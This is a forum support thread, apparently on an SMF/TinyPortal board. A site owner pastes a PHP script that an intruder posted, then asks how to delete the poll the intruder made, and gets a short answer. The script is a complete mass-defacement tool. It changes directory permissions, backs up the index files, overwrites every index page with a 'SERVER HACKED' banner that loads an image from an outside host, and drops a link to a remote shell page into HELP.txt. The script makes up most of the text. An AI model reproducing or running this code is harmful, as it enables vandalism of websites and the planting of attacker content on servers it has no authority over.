ok I got problems (lol that isnt a good statememnt :2funny: )
ok on one of my sites, i got a ip of 202.93.36.90
it made this post:
<?php
// X:>php - q phpmass.php
//
//
// PHP Web Mass Defacement Tools
// -------------------------------
// For Security Research Only
//
//
// Theis tools will create a file page for default homepage (www)
// on specified folder/path.But must have permission writable (w+)
// You must to setup folder/path to show directory ($path)
// Before use this tool,upload first into a site writable/vulnerable perms.
//
// Author: basher13(basher13@linuxmail.org)
// Published Date:19:37:41 Saturday, June 04, 2005
//
echo " ";
echo " ====================================== ";
echo " PHP Web Mass Defacement Tools ";
echo " ====================================== ";
echo " basher13 - Infam0us Gr0up ";
echo " ";
echo " ";
echo "
* .. ";
$path = "usr/www/html"; // Path to show directory list (eg;var/www/html)
echo "
* CHMOD 644 $path..";
chmod ("$path", 0644);
echo "[OK] ";
echo "
* Copying and backup for files.. ";
// Prepare to backup/copy files
$file = "index.htm";
if (!copy($file, $file.´.bak´)) {
print ("[-] failed to copy $file... ");
}
$file = "index.html";
if (!copy($file, $file.´.bak´)) {
print ("[-] failed to copy $file... ");
}
$file = "index.php";
if (!copy($file, $file.´.bak´)) {
print ("[-] failed to copy $file... ");
}
$file = "index.asp";
if (!copy($file, $file.´.bak´)) {
print ("[-] failed to copy $file... ");
}
$file = "index.cfm";
if (!copy($file, $file.´.bak´)) {
print ("[-] failed to copy $file... ");
}
echo "
* List of IP addresses: ";
$hosts = gethostbynamel(´localhost´);
print_r($hosts);
echo " ";
echo "
* Current directory list : ";
if ($handle = opendir(´.´)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
echo "$file ";
}
}
closedir($handle);
}
echo " ";
echo "
* Directory list ´$path´: ";
if (is_dir($path)) {
if ($dh = opendir($path)) {
while (($file = readdir($dh)) !== false) {
print "filename: $file : filetype: " . filetype($path . $file) . " ";
}
closedir($dh);
}
}
echo " ";
echo "
* Now attacking ";
$ip = gethostbyname(´localhost´);
print $ip;
echo ".. ";
echo "
* Building page extension..";
$fp1 = fopen("index.htm", "w+"); // Writting and create a page extention (eg;www/html/index.htm)
$fp2 = fopen("index.html", "w+");
$fp3 = fopen("index.php", "w+");
$fp4 = fopen("index.asp", "w+");
$fp5 = fopen("index.cfm", "w+");
$fp6 = fopen("index.bak", "w+");
$fp7 = fopen("HELP.txt", "w+");
echo "[DONE] ";
echo "
* Set text defacement..";
// Text input use whit javascript
$msg = "<html><head><title>GO PATCH THE SYSTEM! </title><meta name=keywords
content=ads,advertise,banner,logo,art,anime,images ,
picture,graphic,basher13,hacked,deface,hacking,0d ay,security,hacker,program,tools,exploit,vulnerabi
lity,bugs,intrusion,infam0us gr0up,INFGP,INFAMOUS GROUP></head><body bgcolor=#000000
text=#CCCCCC><div align=center><p align=center><font size=7 face=Courier><strong>SISTEM
SERVER HACKED</strong></font><br><strong><font size=3 face=Arial, Helvetica, sansserif>
by</font></strong></p><p align=center><img
src=http://k.domaindlx.com/shellcore/basher13.gif width=100 height=95></p><p align=center><font
color=#FFFF00 size=3 face=Arial, Helvetica, sans-serif><strong>basher13</strong></font></p><div
align=center><font size=2 face=Arial, Helvetica, sans-serif>Infos: [basher13@linuxmail.org] -
[www.98.to/infamous]</font></p></div></div></body></html>";
echo "[DONE] ";
echo "
* Sending bugs writable [w+].. ";
echo "
* Create index.htm..";
if (flock($fp1, LOCK_EX)) {
fwrite($fp1, $msg);
flock($fp1, LOCK_UN);
echo "[OK] ";
}
echo "
* Create index.html..";
if (flock($fp2, LOCK_EX)) {
fwrite($fp2, $msg);
flock($fp2, LOCK_UN);
echo "[OK] ";
}
echo "
* Create index.php..";
if (flock($fp3, LOCK_EX)) {
fwrite($fp3, $msg);
flock($fp3, LOCK_UN);
echo "[OK] ";
}
echo "
* Create index.asp..";
if (flock($fp4, LOCK_EX)) {
fwrite($fp4, $msg);
flock($fp4, LOCK_UN);
echo "[OK] ";
}
echo "
* Create index.cfm..";
if (flock($fp5, LOCK_EX)) {
fwrite($fp5, $msg);
flock($fp5, LOCK_UN);
echo "[OK] ";
}
echo "
* Create index.bak..";
if (flock($fp6, LOCK_EX)) {
fwrite($fp6, $msg);
flock($fp6, LOCK_UN);
echo "[OK] ";
}
if (flock($fp7, LOCK_EX)) {
fwrite($fp7, "http://n.domaindlx.com/shellcore/security.asp");
flock($fp7, LOCK_UN);
echo " ";
echo "
* Sending bugs..[DONE]!! ";
echo "
* tEh ziteS hAS being 0wned! ";
echo " ";
echo "------------------------------------------------------------------ ";
echo " + Infos:[basher13@linuxmail.org]-[www.98.to/infamous] + ";
echo "------------------------------------------------------------------ ";
}else {
echo " ";
echo "[!] [FAILED] Permission is not writable!! ";
echo " ";
echo "------------------------------------------------------------------ ";
echo " + Infos:[solohackerlinks@yahoo.com]-[www.solohackerlink.org] + ";
echo "------------------------------------------------------------------ ";
}
chmod ("$path", 0755);
fclose($fp1);
fclose($fp2);
fclose($fp3);
fclose($fp4);
fclose($fp5);
fclose($fp6);
fclose($fp7);
?>
and then created a poll.. i can not think straight due to alergy meds to delete the sucker!! i can get rid of this post, just tried to edit the poll, is there a way to "delete" the poll?? help..
Just delete the post with the poll and it will be gone.
And also, this is more an SMF question then a TP one, you should know the diffrence by now ;)
couldnt figure it out G6.. but thanks and that did work.. ;)